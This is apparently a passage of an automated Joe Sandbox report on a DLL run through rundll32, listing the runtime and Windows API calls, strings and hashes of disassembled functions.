                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: AdjustPointer
                                                                • String ID:
                                                                • API String ID: 1740715915-0
                                                                • Opcode ID: fb9c0ec1ad51e0f713722a0c7a45395b196e8043d1c89db28e15a4dcaea8b1c0
                                                                • Instruction ID: 577ef5e3ec7947201b1c7d82e4947e8c3955ccfafe26d8b88281b948a3e7f53a
                                                                • Opcode Fuzzy Hash: fb9c0ec1ad51e0f713722a0c7a45395b196e8043d1c89db28e15a4dcaea8b1c0
                                                                • Instruction Fuzzy Hash: DD5128756A6605AFEB188F15CA40BAA77F8EF00718FA0471EDD1687E90DB31E860C794
                                                                APIs
                                                                  • Part of subcall function 6C05C035: _free.LIBCMT ref: 6C05C043
                                                                  • Part of subcall function 6C05CC09: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,6C05D927,6C05FBE4,0000FDE9,00000000,?,?,?,6C05F95D,0000FDE9,00000000,?), ref: 6C05CCB5
                                                                • GetLastError.KERNEL32 ref: 6C05BA7B
                                                                • __dosmaperr.LIBCMT ref: 6C05BA82
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6C05BAC1
                                                                • __dosmaperr.LIBCMT ref: 6C05BAC8
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                • String ID:
                                                                • API String ID: 167067550-0
                                                                • Opcode ID: e5464925532292925ba66d608042bf811d9a23b887319439f4f3fab1b1181cdf
                                                                • Instruction ID: 644f160c3848284b6d240c05c47d207050c4d563fb258d97e89acd12fa5b17a9
                                                                • Opcode Fuzzy Hash: e5464925532292925ba66d608042bf811d9a23b887319439f4f3fab1b1181cdf
                                                                • Instruction Fuzzy Hash: AF2198B5604205AFDB109F668E80F5BB7ECEF053687944619F568D7E90E735FC2087A0
                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,?,6C05F6A4,?,00000001,6C05D998,?,6C05FB5E,00000001,?,?,?,6C05D927,?,00000000), ref: 6C05B2D1
                                                                • _free.LIBCMT ref: 6C05B32E
                                                                • _free.LIBCMT ref: 6C05B364
                                                                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,6C05FB5E,00000001,?,?,?,6C05D927,?,00000000,00000000,6C06CB78,0000002C,6C05D998), ref: 6C05B36F
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_free
                                                                • String ID:
                                                                • API String ID: 2283115069-0
                                                                • Opcode ID: 794406c8613840d773d5ff42118183060cc23a0fe3476d3a0012f1ff0ec7abdc
                                                                • Instruction ID: 21eb3ba20572b007c1c88f8a2c0a8b5b377a9d050e33cabd8f3fbe1429771dea
                                                                • Opcode Fuzzy Hash: 794406c8613840d773d5ff42118183060cc23a0fe3476d3a0012f1ff0ec7abdc
                                                                • Instruction Fuzzy Hash: EE11EB3170C705ABEB101A764F81B7F25F9A7C277C7A40624F234E3AC1DF21B8294160
                                                                APIs
                                                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6C0600CA,?,00000001,?,00000001,?,6C05F633,?,?,00000001), ref: 6C06067D
                                                                • GetLastError.KERNEL32(?,6C0600CA,?,00000001,?,00000001,?,6C05F633,?,?,00000001,?,00000001,?,6C05FB7F,6C05D927), ref: 6C060689
                                                                  • Part of subcall function 6C06064F: CloseHandle.KERNEL32(FFFFFFFE,6C060699,?,6C0600CA,?,00000001,?,00000001,?,6C05F633,?,?,00000001,?,00000001), ref: 6C06065F
                                                                • ___initconout.LIBCMT ref: 6C060699
                                                                  • Part of subcall function 6C060611: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C060640,6C0600B7,00000001,?,6C05F633,?,?,00000001,?), ref: 6C060624
                                                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6C0600CA,?,00000001,?,00000001,?,6C05F633,?,?,00000001,?), ref: 6C0606AE
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                • String ID:
                                                                • API String ID: 2744216297-0
                                                                • Opcode ID: 647c24aa93fe6898f8e74a21d6ebdf59982a6f4beffd4216b98a8d5514514926
                                                                • Instruction ID: e31a89c3c756f7bf0931ed1a7a240c732e9a8bc372879fd48ef25c9a41d0a471
                                                                • Opcode Fuzzy Hash: 647c24aa93fe6898f8e74a21d6ebdf59982a6f4beffd4216b98a8d5514514926
                                                                • Instruction Fuzzy Hash: C3F03776144155BBCF125FD7CC04A9B3FF5FB46368B044120FA19C6620DB318820DBD5
                                                                APIs
                                                                • _free.LIBCMT ref: 6C05AC58
                                                                  • Part of subcall function 6C05B90F: HeapFree.KERNEL32(00000000,00000000,?,6C05AB0E), ref: 6C05B925
                                                                  • Part of subcall function 6C05B90F: GetLastError.KERNEL32(?,?,6C05AB0E), ref: 6C05B937
                                                                • _free.LIBCMT ref: 6C05AC6B
                                                                • _free.LIBCMT ref: 6C05AC7C
                                                                • _free.LIBCMT ref: 6C05AC8D
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 7e9b83b02c912b8eef1da8f286c606f93a8437bc0804cb47513c671c6e63988c
                                                                • Instruction ID: f45cc9fbc0ceef70354747176ef24b5f150ad9e1fd065d46db13d71ed7d01cad
                                                                • Opcode Fuzzy Hash: 7e9b83b02c912b8eef1da8f286c606f93a8437bc0804cb47513c671c6e63988c
                                                                • Instruction Fuzzy Hash: E9E086F16249299FCF412F1BC4047A53F7EEB466143810016E40443B10CF7133729F88
                                                                APIs
                                                                  • Part of subcall function 6C05C42C: GetOEMCP.KERNEL32(00000000,6C05C69D,6C05F2B8,00000000,00000000,00000000,00000000,?,6C05F2B8), ref: 6C05C457
                                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,6C05C6E4,?,00000000,6C05F2B8,00013385,?,?,?,?,00000000), ref: 6C05C8EF
                                                                • GetCPInfo.KERNEL32(00000000,6C05C6E4,?,?,6C05C6E4,?,00000000,6C05F2B8,00013385,?,?,?,?,00000000,00000000), ref: 6C05C931
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: CodeInfoPageValid
                                                                • String ID: NKxo
                                                                • API String ID: 546120528-1440849049
                                                                • Opcode ID: 3a4a9c9492acdec43db16185b0ad5e2f65b3ad434e9574282492f08544e54f1d
                                                                • Instruction ID: b04c64aed19ac5b1955c7d4caf5e34d6deeb8a054b5edb1112afa56da7047c7d
                                                                • Opcode Fuzzy Hash: 3a4a9c9492acdec43db16185b0ad5e2f65b3ad434e9574282492f08544e54f1d
                                                                • Instruction Fuzzy Hash: 015146B5A043459FEB11EF36C9447ABBBF4EF4A308F94402EC092C7A41E734A555CB90
                                                                APIs
                                                                • GetCPInfo.KERNEL32(E8458D00,?,6C05F2C4,6C05F2B8,00000000), ref: 6C05C534
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: Info
                                                                • String ID: $NKxo
                                                                • API String ID: 1807457897-3511269702
                                                                • Opcode ID: b7b711cf8f9325c3b89767a0e797ecdfdc7aecefbab7c8a8d95d094e9c9327b5
                                                                • Instruction ID: 87071b1da46a560758c6ad4605c7ec17bab4a91938dbeb0fadb0171eab19b6a2
                                                                • Opcode Fuzzy Hash: b7b711cf8f9325c3b89767a0e797ecdfdc7aecefbab7c8a8d95d094e9c9327b5
                                                                • Instruction Fuzzy Hash: 704170705042485BDB219B58CE84FFB7BFDEB09708FE404ACD5DA87582D234EA95CB50
                                                                APIs
                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 6C055EC3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: Concurrency::cancel_current_task
                                                                • String ID: NKx$NKx
                                                                • API String ID: 118556049-2281152737
                                                                • Opcode ID: a4690615a8e15b848ae1f25d21b9aa08e005e4a2579464e3d385850e2d7959d3
                                                                • Instruction ID: 4a10f7207382bad40db1e5a8ca7c63b4b756aa19e1538ce6ec8471929572f0ff
                                                                • Opcode Fuzzy Hash: a4690615a8e15b848ae1f25d21b9aa08e005e4a2579464e3d385850e2d7959d3
                                                                • Instruction Fuzzy Hash: 023137757052049BD7188E7CDA90B6EB7E9EF49324BE0033EE825C7B81D770A9648791
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: C:\Windows\SysWOW64\rundll32.exe
                                                                • API String ID: 0-2837366778
                                                                • Opcode ID: d1e94f0262cadfbaaf6f8c098a1a0c1f1cd2b07ac3a4a507b72c41b8cdac8c91
                                                                • Instruction ID: 293751f031f1c6306720162ac2ba2f0d2212c6bf778da021a73686f5428b3a6c
                                                                • Opcode Fuzzy Hash: d1e94f0262cadfbaaf6f8c098a1a0c1f1cd2b07ac3a4a507b72c41b8cdac8c91
                                                                • Instruction Fuzzy Hash: 6C4196B1A04215AFDB11DFDD8A84BBFBBFCEB85714FA00066E51497740E7B09A64CB60
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID: NKxo
                                                                • API String ID: 269201875-1440849049
                                                                • Opcode ID: 63c7029b069a2280badd1b82295fb3b9c39ee77917b0fb11c6fee195f251c55f
                                                                • Instruction ID: c5e01963ba1fa45ef6a598f0b25df6bda39ca68df82dfd77dd5162a97dca22f8
                                                                • Opcode Fuzzy Hash: 63c7029b069a2280badd1b82295fb3b9c39ee77917b0fb11c6fee195f251c55f
                                                                • Instruction Fuzzy Hash: 3941E276A002149FDB10DF68CA84BA9B3F6EF89318B664168D555EB740DB30ED15CB90
                                                                APIs
                                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6C05868F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: EncodePointer
                                                                • String ID: MOC$RCC
                                                                • API String ID: 2118026453-2084237596
                                                                • Opcode ID: 667b79288bcbf0d20dae39905bf9f5994f170fc09127d3ac421f18a5d4dcf445
                                                                • Instruction ID: fd6ad319b6a8d69628edb52ea28c9e05911ba6b607e506934b0d662bf6f6a532
                                                                • Opcode Fuzzy Hash: 667b79288bcbf0d20dae39905bf9f5994f170fc09127d3ac421f18a5d4dcf445
                                                                • Instruction Fuzzy Hash: B8415A71A10209AFCF05CF94CE80BEE7BF5BF48308F54825AEA14A7651D335EA60DB50
                                                                APIs
                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,6C05FBE4,6C05D927,00000001,?,00000000,?,?,?,6C05D927,?,00000000), ref: 6C05F98E
                                                                • GetLastError.KERNEL32(6C05FBE4,6C05D927,00000001,?,00000000,?,?,?,6C05D927,?,00000000,00000000,6C06CB78,0000002C,6C05D998,?), ref: 6C05F9BE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLastWrite
                                                                • String ID: NKxo
                                                                • API String ID: 442123175-1440849049
                                                                • Opcode ID: b5ae600186f23271be18452a19a7d02b7969baed9d8602d84b0a0d0dde304411
                                                                • Instruction ID: f5997011811900a8061fd88e4bef21358ddced973df7f31f2845a29383540598
                                                                • Opcode Fuzzy Hash: b5ae600186f23271be18452a19a7d02b7969baed9d8602d84b0a0d0dde304411
                                                                • Instruction Fuzzy Hash: 2331AFB1B00619AFEB14CF69CD81BEAB3F9EB48304F5440A9E505D7690DB74EE90CB61
                                                                APIs
                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,E8458D00), ref: 6C05E1DD
                                                                • __freea.LIBCMT ref: 6C05E1E6
                                                                  • Part of subcall function 6C05B833: HeapAlloc.KERNEL32(00000000,00013385,00013385,?,6C05C6BF,00000220,6C05F2B8,00013385,?,?,?,?,00000000,00000000,?,6C05F2B8), ref: 6C05B865
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: AllocHeapStringType__freea
                                                                • String ID: NKxo
                                                                • API String ID: 2523373117-1440849049
                                                                • Opcode ID: e4ae8dbc47780adba001302fca040a61973f8251e01c0e70c52a30149794238e
                                                                • Instruction ID: bb4db3fa957b1d42940b90ab0582394ce88d66cafc799a9e419f686440f8efc8
                                                                • Opcode Fuzzy Hash: e4ae8dbc47780adba001302fca040a61973f8251e01c0e70c52a30149794238e
                                                                • Instruction Fuzzy Hash: 2931CF7190120AABEB108F65CD40FEF7BF8EF44B18F904124E86497650DB389961CBE4
                                                                APIs
                                                                • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000001,?,?,6C05FBD4,6C05D927,00000001,?,00000000,?,?), ref: 6C05F866
                                                                • GetLastError.KERNEL32(?,6C05FBD4,6C05D927,00000001,?,00000000,?,?,?,6C05D927,?,00000000,00000000,6C06CB78,0000002C,6C05D998), ref: 6C05F88C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLastWrite
                                                                • String ID: NKxo
                                                                • API String ID: 442123175-1440849049
                                                                • Opcode ID: f227305758d5d41e92766b8b7e251d653fdb262a9ba279e181cd8f1109c2c856
                                                                • Instruction ID: 7a0f523eb4782709c72eab7d62164c4eb1ad4df5abef12f042f50bea5087e27e
                                                                • Opcode Fuzzy Hash: f227305758d5d41e92766b8b7e251d653fdb262a9ba279e181cd8f1109c2c856
                                                                • Instruction Fuzzy Hash: 19219E31A002199FDB14CF29CD80AEEB3F9FF49314B5445AAE909D7250D730EE91CAA0
                                                                APIs
                                                                • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000001,?,?,6C05FBF4,6C05D927,00000001,?,00000000,?,?), ref: 6C05F77D
                                                                • GetLastError.KERNEL32(?,6C05FBF4,6C05D927,00000001,?,00000000,?,?,?,6C05D927,?,00000000,00000000,6C06CB78,0000002C,6C05D998), ref: 6C05F7A3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLastWrite
                                                                • String ID: NKxo
                                                                • API String ID: 442123175-1440849049
                                                                • Opcode ID: 5bfe3d9eb031a3abee036b98a6fdba5b00604bbcb4fb26a2d8ad568729017dcf
                                                                • Instruction ID: 91169fd60b26ca74bdb7e1341a9eb3d509a4d4bcbd9ebaf8c6e0d5c5ff68630a
                                                                • Opcode Fuzzy Hash: 5bfe3d9eb031a3abee036b98a6fdba5b00604bbcb4fb26a2d8ad568729017dcf
                                                                • Instruction Fuzzy Hash: 4921B134A0021C9FDB15CF6AC980AEDB7F9EB8D305F6441A9E946D7601D634EE468B60
                                                                APIs
                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6C056B4D
                                                                • ___raise_securityfailure.LIBCMT ref: 6C056C35
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2924991559.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                • Associated: 0000000C.00000002.2924945917.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925057270.000000006C066000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925098569.000000006C06E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                • Associated: 0000000C.00000002.2925131103.000000006C070000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_6c050000_rundll32.jbxd
                                                                Similarity
                                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                • String ID: NKxo
                                                                • API String ID: 3761405300-1440849049
                                                                • Opcode ID: 9a5e144dfb0364b07398cb8388ed9f1834e7c4dd76a828570c85e33015a86641
                                                                • Instruction ID: fe72b962c1f3588f34a596e96831d6ce71fc80d5a75a1066a58155abe5e963e1
                                                                • Opcode Fuzzy Hash: 9a5e144dfb0364b07398cb8388ed9f1834e7c4dd76a828570c85e33015a86641
                                                                • Instruction Fuzzy Hash: 7C2114B57053019BEB00CF1BD585B643BFCBB4A314F60502AE618CBB91EB705484CF48